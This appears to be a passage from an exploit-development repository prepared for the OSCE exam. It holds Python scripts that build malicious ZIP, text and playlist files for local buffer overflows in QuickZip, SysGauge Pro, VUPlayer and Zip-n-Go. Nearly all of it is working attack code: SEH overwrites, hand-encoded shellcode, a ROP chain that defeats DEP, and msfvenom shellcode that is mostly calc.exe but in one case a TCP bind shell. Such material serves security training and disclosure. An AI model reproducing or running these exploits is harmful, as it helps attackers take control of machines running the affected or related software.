LocalFileHeader  = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00'         # general purpose bit flag
LocalFileHeader += '\x00\x00'         # compression method
LocalFileHeader += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00'     # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes 
LocalFileHeader += '\x00\x00'         # extra field length
LocalFileHeader += '\x00'             # file name
#LocalFileHeader += '\x00'             # extra filed 
################## Central Directory File Header ##################
CDFileHeader     = '\x50\x4b\x01\x02' # cd file header signature 
CDFileHeader    += '\x14\x00'         # version made by 0x14 = 20 -> 2.0
CDFileHeader    += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader    += '\x00\x00'         # general purpose bit flag
CDFileHeader    += '\x00\x00'         # compression method 
CDFileHeader    += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader    += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader    += '\x00\x00\x00\x00' # CRC-32
CDFileHeader    += '\x00\x00\x00\x00' # compressed size
CDFileHeader    += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader    += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes
CDFileHeader    += '\x00\x00'         # extra field length
CDFileHeader    += '\x00\x00'         # file comment length 
CDFileHeader    += '\x00\x00'         # disk number where file starts
CDFileHeader    += '\x01\x00'         # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader    += '\x24\x00\x00\x00' # external file attributes 
CDFileHeader    += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader    += '\x00'             # file name
#CDFileHeader    += '\x00'             # extra field 
#CDFileHeader    += '\x00'             # file comment 
################ End of Central Directory Record ##################
EOCDRHeader      = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader     += '\x00\x00'         # number of this disk 
EOCDRHeader     += '\x00\x00'         # disk where central directory starts 
EOCDRHeader     += '\x01\x00'         # number of central directory records on this disk 
EOCDRHeader     += '\x01\x00'         # total number of central directory records 
EOCDRHeader     += '\x12\x10\x00\x00' # size of central directory (4114 bytes)
EOCDRHeader     += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive 
EOCDRHeader     += '\x00\x00'         # comment length 
#EOCDRHeader     += '\x00'             # comment 

Evil  = '\x41' * 294
Evil += '\x75\x06\x74\x06'            # nSEH JZ & JNZ (aka jump net)
Evil += '\x3d\x1b\x7e\x6d'            # SEH pop esi,pop ebx, retn in D3DXOF.dll (OS module - WinXP SP3)
Evil += '\x41\x41'                    # compensate for short jump
Evil += '\x54'                        # PUSH ESP                  * save stack pointer to edi 
Evil += '\x5F'                        # POP EDI
Evil += '\x54'                        # PUSH ESP                  * point esp to where we want to decode otherwise bad shellcode
Evil += '\x58'                        # POP EAX
Evil += '\x05\x24\x13\x11\x11'        # ADD EAX,11111324
Evil += '\x05\x25\x16\x11\x11'        # ADD EAX,11111625
Evil += '\x2D\x21\x22\x22\x22'        # SUB EAX,22222221
Evil += '\x50'                        # PUSH EAX
Evil += '\x5C'                        # POP ESP                   * mov eax to esp
#root@kali:/opt/Slink# python Slink.py                            * decode the following 
#Enter your shellcode: 89FC89F8054E070000FFE0                       mov    esp,edi           restore stack pointer 
#[!] Shellcode size is not divisible by 4                           mov    eax,edi           use edi as an relative address 
#[+] Padding shellcode with 1 NOPS..                                add    eax,0x74e         align eax to the start oh shellcode 
#[+] Encoding [90e0ff00]..                                          jmp    eax               jump to shellcode 
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Evil += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Evil += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Evil += "\x05\x11\x77\x61\x41" ## add  eax, 0x41617711
Evil += "\x05\x11\x66\x51\x41" ## add  eax, 0x41516611
Evil += "\x05\x11\x55\x61\x41" ## add  eax, 0x41615511
Evil += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Evil += "\x50"                 ## push eax
#[+] Encoding [00074e05]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Evil += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Evil += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Evil += "\x05\x13\x36\x13\x11" ## add  eax, 0x11133613
Evil += "\x05\x13\x25\x13\x11" ## add  eax, 0x11132513
Evil += "\x05\x12\x26\x13\x11" ## add  eax, 0x11132612
Evil += "\x2D\x33\x33\x32\x33" ## sub  eax, 0x33323333
Evil += "\x50"                 ## push eax
#[+] Encoding [f889fc89]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Evil += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
Evil += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
Evil += "\x05\x44\x76\x44\x74" ## add  eax, 0x74447644
Evil += "\x05\x44\x65\x44\x64" ## add  eax, 0x64446544
Evil += "\x05\x34\x54\x34\x53" ## add  eax, 0x53345434
Evil += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
Evil += "\x50"                 ## push eax
Evil += '\x42' * (250-116)
Evil += shellcode 
Evil += '\x41' * (4064-294-4-4-250-len(shellcode))
Evil += '.txt'

buffer  = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader  

try:
	f=open("Evil.zip","w")
	print "[+] Creating %s bytes evil payload.." %len(Evil)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e

================================================
FILE: Local Buffer Overflow/QuickZipv4.60.019/README.md
================================================
### Quick Zip v4.60.019
Local SEH overwrite with restricted characters set. I thought this exploit was quite challenging yet fun!

<p align="center">
  <img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/QuickZipv4.60.019/PoC.gif">
</p>


================================================
FILE: Local Buffer Overflow/SysGaugeProv4.6.12/Exploit.py
================================================
#!/usr/bin/python
##################################################################################################################
# Exploit Title       : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH)                                       #
# Exploit Author      : Hashim Jawad                                                                             #
# Twitter             : @ihack4falafel                                                                           #
# Author Website      : ihack4falafel[.]com                                                                      #
# Vendor Homepage     : http://www.sysgauge.com/                                                                 #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe                             #
# Tested on           : Windows XP Professional - SP3                                                            #
# Steps to reproduce  : ~ Copy content of payload.txt                                                            #
#                       ~ Under Register type in "falafel" in Customer Name field                                #
#                       ~ Paste the content of payload.txt in Unlock Key field and click Register                #
##################################################################################################################

import struct

# ***notes***
# ~ this particular function [Register] of the program only accept characters [00-7f] excluding "\x00\x09\x0a\x0d"
# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean address
# ~ the following are Flexense products effected by the same vulnerability (note buffer size and offsets may vary)
##################################################################################################################
#   ~ SysGauge Ultimate v4.6.12
#   ~ Azure DEX Pro v2.2.16
#   ~ Azure DEX Ultimate v2.2.16
#   ~ DiskBoss Pro v9.1.16
#   ~ DiskBoss Ultimate v9.1.16
#   ~ SyncBreeze Pro v10.7.14
#   ~ SyncBreeze Ultimate v10.7.14
#   ~ DiskPulse Pro v10.7.14
#   ~ DiskPulse Ultimate v10.7.14
#   ~ DiskSavvy Pro v10.7.14
#   ~ DiskSavvy Ultimate v10.7.14
#   ~ DiskSorter Pro v10.7.14
#   ~ DiskSorter Ultimate v10.7.14
#   ~ DupScout Pro v10.7.14
#   ~ DupScout Ultimate v10.7.14
#   ~ VX Search Pro v10.7.14
#   ~ VX Search Ultimate v10.7.14
##################################################################################################################

# overwrite SEH with clean address of [pop, pop, ret]
buffer  = "\x41" * 780                                  # junk to nSEH
buffer += "\x74\x06\x42\x42"                            # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<L', 0x10013d16)                 # SEH (pop esi # pop ecx # retn  | [libdgg.dll])
buffer += "\x43" * 28                                   # some more junk

# push calc.exe instructions [encoded] into the stack 
# Disassembly:
# 0:  33 c0                   xor    eax,eax           # zero out eax register
# 2:  50                      push   eax               # push eax (null-byte) to terminate "calc.exe"
# 3:  68 2E 65 78 65          push   ".exe"            # push the ASCII string to the stack
# 8:  68 63 61 6C 63          push   "calc"            # 
# d:  8b c4                   mov    eax,esp           # put the pointer to the ASCII string in eax
# f:  6a 01                   push   0x1               # push uCmdShow parameter to the stack
# 11: 50                      push   eax               # push the pointer to lpCmdLine to the stack
# 12: bb 5d 2b 86 7c          mov    ebx,0x7c862b5d    # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx
# 17: ff d3                   call   ebx               # call WinExec()

# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
# "\x33\xc0\x50\x68"
# "\x2e\x65\x78\x65"
# "\x68\x63\x61\x6C"
# "\x63\x8b\xc4\x6a"
# "\x01\x50\xbb\x5d"
# "\x2b\x86\x7c\xff"
# "\xd3\x90\x90\x90"

# starting from the bottom up in little endian order
# first   push "\x90\x90\x90\xd3"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x90\x90\x90\xd3" into eax and push it to the stack
buffer += "\x05\x72\x70\x70\x70"       ### add eax,0x70707072
buffer += "\x05\x61\x20\x20\x20"       ### add eax,0x20202061
buffer += "\x50"                       ### push eax 
##############################################################

# second  push "\xff\x7c\x86\x2b"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\xff\x7c\x86\x2b" into eax and push it to the stack
buffer += "\x05\x01\x32\x35\x66"       ### add eax,0x66353201
buffer += "\x05\x15\x32\x35\x66"       ### add eax,0x66353215
buffer += "\x05\x15\x22\x12\x33"       ### add eax,0x33122215
buffer += "\x50"                       ### push eax 
##############################################################

# third   push "\x5d\xbb\x50\x01"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x5d\xbb\x50\x01" into eax and push it to the stack 
buffer += "\x05\x01\x30\x65\x36"       ### add eax,0x36653001
buffer += "\x05\x01\x20\x56\x27"       ### add eax,0x27562001
buffer += "\x48"                       ### dec eax
buffer += "\x50"                       ### push eax 
##############################################################

# fourth  push "\x6a\xc4\x8b\x63"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x6a\xc4\x8b\x63" into eax and push it to the stack 
buffer += "\x05\x32\x46\x70\x35"       ### add eax,0x35544632
buffer += "\x05\x31\x43\x70\x35"       ### add eax,0x35704531
buffer += "\x50"                       ### push eax 
##############################################################

# fifth   push "\x6c\x61\x63\x68"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x6c\x61\x63\x68" into eax and push it to the stack
buffer += "\x05\x34\x32\x31\x36"       ### add eax,0x36313234
buffer += "\x05\x34\x31\x30\x36"       ### add eax,0x36303134
buffer += "\x50"                       ### push eax 
##############################################################

# sixth   push "\x65\x78\x65\x2e"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x65\x78\x65\x2e" into eax and push it to the stack 
buffer += "\x05\x17\x33\x34\x33"       ### add eax,0x33343317
buffer += "\x05\x17\x32\x44\x32"       ### add eax,0x32443217
buffer += "\x50"                       ### push eax 
##############################################################

# seventh push "\x68\x50\xc0\x33"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x68\x50\xc0\x33" into eax and push it to the stack 
buffer += "\x05\x22\x60\x30\x34"       ### add eax,0x34306022
buffer += "\x05\x11\x60\x20\x34"       ### add eax,0x34206011
buffer += "\x50"                       ### push   eax 
##############################################################

# push 20 nops to the stack for padding
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10"       ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01"       ### and eax, 0x01010101

# move "\x90\x90\x90\x90" into eax and push it to the stack 
buffer += "\x05\x70\x70\x70\x70"       ### add eax,0x70707070
buffer += "\x05\x20\x20\x20\x20"       ### add eax,0x20202020
buffer += "\x50"                       ### push eax
buffer += "\x50"                       ### push eax
buffer += "\x50"                       ### push eax
buffer += "\x50"                       ### push eax
buffer += "\x50"                       ### push eax
##############################################################

# push "jmp esp" address [encoded] to the stack 
# 0x6709e053 : "\xff\xe4" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:\Program Files\SysGauge Pro\bin\QtCore4.dll)
# 0:  25 10 10 10 10          and    eax,0x10101010
# 5:  25 01 01 01 01          and    eax,0x1010101
# a:  05 31 70 03 34          add    eax,0x34037031
# f:  05 22 70 06 33          add    eax,0x33067022
# 14: 50                      push   eax 

buffer += "\x25\x10\x10\x10\x10\x25\x01\x01\x01\x01\x05\x31\x70\x03\x34\x05\x22\x70\x06\x33\x50"

# the program converts "\xff" to "c3" [retn instruction] thus popping previously pushed to the stack address "jmp esp" to eip ;)
buffer += "\xff"
buffer += "C" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1)    ### junk 
try:
    f=open("payload.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

================================================
FILE: Local Buffer Overflow/SysGaugeProv4.6.12/readme.md
================================================
### SysGauge Pro v4.6.12
Structured Exception Handler (SEH) chain overwrite exploit found during my prep to take on OSCE, had to make custom shellcode/encoder in order to bypass bad character limitations. See the link [EDB-ID: 44455](https://www.exploit-db.com/exploits/44455/)

![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/SysGaugeProv4.6.12/PoC.gif)


================================================
FILE: Local Buffer Overflow/VUPlayerv2.49/Exploit.py
================================================
#!/usr/bin/env python

import struct
import time

#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d\x1a" -f python -v shellcode (227 bytes)
 
shellcode  = ""
shellcode += "\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
shellcode += "\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
shellcode += "\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
shellcode += "\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
shellcode += "\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
shellcode += "\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
shellcode += "\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
shellcode += "\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
shellcode += "\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
shellcode += "\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
shellcode += "\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
shellcode += "\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
shellcode += "\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
shellcode += "\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
shellcode += "\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
shellcode += "\x1c\x80"

buffer = "HTTP://" + "\x41" * 1005

###   ROP Chain for VirtualProtect()   ###
#========================================#

### stack pivot
buffer += struct.pack('<L', 0x1003a084)  # RETN (ROP NOP) [BASS.dll]

### edx = NewProtect (0x40)
buffer += struct.pack('<L', 0x10015f82)  # POP EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0xffffffc0)  # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x10014db4)  # NEG EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10038a6d)  # XCHG EAX,EDX # RETN [BASS.dll]

### ebx = dwSize (501)
buffer += struct.pack('<L', 0x10015f82)  # POP EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0xfffffaff)  # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x10014db4)  # NEG EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10032f72)  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]

### eax = ptr to &VirtualProtect()
buffer += struct.pack('<L', 0x10015f82)  # POP EAX # RETN [BASS.dll]               
buffer += struct.pack('<L', 0x1060e25c)  # ptr to &VirtualProtect() [BASSMIDI.dll]

### ecx = lpOldProtect (ptr to writeable address)
buffer += struct.pack('<L', 0x101049ec)  # POP ECX # RETN [BASSWMA.dll] 
buffer += struct.pack('<L', 0x101082db)  # &Writable location [BASSWMA.dll]

### esp = lPAddress (automatic) aka shellcode

### ebp = pop 4 bytes
buffer += struct.pack('<L', 0x10010157)  # POP EBP # RETN [BASS.dll] 
buffer += struct.pack('<L', 0x10010157)  # skip 4 bytes [BASS.dll]

### esi = ptr to jmp [eax]
buffer += struct.pack('<L', 0x1001d804)  # POP ESI # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10101c02)  # JMP [EAX] [BASSWMA.dll]

### edi = ROP NOP (RETN)
buffer += struct.pack('<L', 0x100190b0)  # POP EDI # RETN [BASS.dll]
buffer += struct.pack('<L', 0x1003a084)  # RETN (ROP NOP) [BASS.dll]

### push register values to poor stack
buffer += struct.pack('<L', 0x1001d7a5)  # PUSHAD # RETN [BASS.dll]
buffer += struct.pack('<L', 0x1010539f)  # jmp esp in BASSWMA.dll universal

buffer += "\x90" * 20                    # make space for shellcode decoder
buffer += shellcode                      # evil calc.exe 

### padding
buffer += "\x43" * (20000-7-1005-(4*21)-20-len(shellcode))

try:
	f=open("OpenMe.m3u","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	time.sleep(1)
	f.write(buffer)
	f.close()
	print "[+] File created. Load that shit up!"
except:
	print "File cannot be created"

================================================
FILE: Local Buffer Overflow/VUPlayerv2.49/readme.md
================================================
### VUPlayer v2.49
ROP chain exploit to pop calc.exe by bypassing DEP protection on Windows XP SP3 using Windows VirtualProtect() API. 

![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/VUPlayerv2.49/PoC.JPG)


================================================
FILE: Local Buffer Overflow/Zip-n-Gov4.9/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title      : Zip-n-Go v4.9 - Local Buffer Overflow (SEH)                                         #
# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #
# Vendor Homepage    : http://mc1soft.com/index.shtml                                                      #
# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe                                          #
# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                    #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 05-28-18: Contacted vendor, no response 
# 05-30-18: Contacted vendor again, responded with patch and requested further testing
# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested
# 05-31-18: Vendor applied new patch and requested further testing
# 05-31-18: The new patch nullified the vulnerability
# 06-03-18: Version 4.95 was released  
# 06-03-18: Proof of concept exploit published

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
#Payload size: 710 bytes
shellcode =  ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30"
shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b"
shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b"
shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36"
shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c"
shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d"
shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67"
shellcode += "\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c"
shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38"
shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30"
shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53"
shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61"
shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f"
shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55"
shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d"
shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38"
shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c"
shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53"
shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39"
shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31"
shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f"
shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d"
shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30"
shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54"
shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f"
shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30"
shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49"
shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a"
shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50"
shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f"
shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58"
shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76"
shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32"
shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37"
shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f"
shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b"
shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48"
shellcode += "\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75"
shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79"
shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56"
shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d"
shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71"
shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66"
shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36"
shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76"
shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f"
shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e"
shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58"
shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b"
shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76"
shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c"
shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30"
shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52"
shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55"
shellcode += "\x41\x41"

####################### ZIP File Structure ######################## 
###################################################################
######################## Local File Header ########################
LocalFileHeader  = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00'         # general purpose bit flag
LocalFileHeader += '\x00\x00'         # compression method
LocalFileHeader += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00'     # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes 
LocalFileHeader += '\x00\x00'         # extra field length
LocalFileHeader += '\x00'             # file name
#LocalFileHeader += '\x00'             # extra filed 
################## Central Directory File Header ##################
CDFileHeader     = '\x50\x4b\x01\x02' # cd file header signature 
CDFileHeader    += '\x14\x00'         # version made by 0x14 = 20 -> 2.0
CDFileHeader    += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader    += '\x00\x00'         # general purpose bit flag
CDFileHeader    += '\x00\x00'         # compression method 
CDFileHeader    += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader    += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader    += '\x00\x00\x00\x00' # CRC-32
CDFileHeader    += '\x00\x00\x00\x00' # compressed size
CDFileHeader    += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader    += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes
CDFileHeader    += '\x00\x00'         # extra field length
CDFileHeader    += '\x00\x00'         # file comment length 
CDFileHeader    += '\x00\x00'         # disk number where file starts
CDFileHeader    += '\x01\x00'         # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader    += '\x24\x00\x00\x00' # external file attributes 
CDFileHeader    += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader    += '\x00'             # file name
#CDFileHeader    += '\x00'             # extra field 
#CDFileHeader    += '\x00'             # file comment 
################ End of Central Directory Record ##################
EOCDRHeader      = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader     += '\x00\x00'         # number of this disk 
EOCDRHeader     += '\x00\x00'         # disk where central directory starts 
EOCDRHeader     += '\x01\x00'         # number of central directory records on this disk 
EOCDRHeader     += '\x01\x00'         # total number of central directory records 
EOCDRHeader     += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes
EOCDRHeader     += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive 
EOCDRHeader     += '\x00\x00'         # comment length 
#EOCDRHeader     += '\x00'             # comment 
 
Witchcraft  = '\x54'                      # PUSH ESP          * save stack pointer
Witchcraft += '\x5F'                      # POP EDI
Witchcraft += '\x54'                      # PUSH ESP          * calculate offset for decoder  
Witchcraft += '\x58'                      # POP EAX
Witchcraft += '\x05\x11\x21\x11\x11'      # ADD EAX,11112111
Witchcraft += '\x05\x11\x21\x11\x11'      # ADD EAX,11112111
